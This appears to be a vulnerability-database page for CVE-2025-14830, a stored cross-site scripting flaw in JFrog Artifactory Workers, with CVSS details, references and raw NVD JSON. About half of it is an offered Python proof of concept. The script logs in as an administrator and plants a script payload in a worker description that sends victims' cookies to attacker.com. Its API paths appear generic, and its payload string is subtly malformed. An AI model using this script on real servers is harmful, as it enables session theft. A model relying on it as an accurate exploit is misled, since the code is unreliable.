CVE-2025-14830

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in JFrog Artifactory (Workers) allows Cross-Site Scripting (XSS).This issue affects Artifactory (Workers): from >=7.94.0 through <7.117.10.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

JFrog Artifactory (Workers) >= 7.94.0

JFrog Artifactory (Workers) < 7.117.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-14830 PoC - Stored XSS in JFrog Artifactory Workers
# Target: JFrog Artifactory < 7.117.10

TARGET = "https://artifactory.example.com"
USERNAME = "admin"
PASSWORD = "password"

# XSS payload for Workers module
XSS_PAYLOAD = '<script>document.location="https://attacker.com/log?c=' + \
              '"+document.cookie+"</script>'

def exploit():
    session = requests.Session()
    
    # Step 1: Authentication
    login_url = f"{TARGET}/ui/api/v1/auth/login"
    auth_data = {"user": USERNAME, "password": PASSWORD}
    response = session.post(login_url, json=auth_data, verify=False)
    
    if response.status_code != 200:
        print("[-] Authentication failed")
        return False
    
    access_token = response.json().get("access_token")
    headers = {"Authorization": f"Bearer {access_token}"}
    
    # Step 2: Inject XSS payload in Workers module
    workers_url = f"{TARGET}/ui/api/v1/workers"
    exploit_data = {
        "name": "Worker-Test",
        "description": XSS_PAYLOAD,
        "config": {"enabled": True}
    }
    
    response = session.post(workers_url, json=exploit_data, headers=headers, verify=False)
    
    if response.status_code in [200, 201]:
        print("[+] XSS payload injected successfully")
        print(f"[+] Payload: {XSS_PAYLOAD}")
        return True
    else:
        print(f"[-] Injection failed: {response.status_code}")
        return False

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14830
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14830
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14830/
[4] VulDB https://vuldb.com/cve/CVE-2025-14830
[5] https://jfrog.com/help/r/jfrog-release-information/jfrog-security-advisories

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14830", "sourceIdentifier": "[email protected]", "published": "2026-01-04T10:15:40.123", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in JFrog Artifactory (Workers) allows Cross-Site Scripting (XSS).This issue affects Artifactory (Workers): from >=7.94.0 through <7.117.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://jfrog.com/help/r/jfrog-release-information/jfrog-security-advisories", "source": "[email protected]"}]}}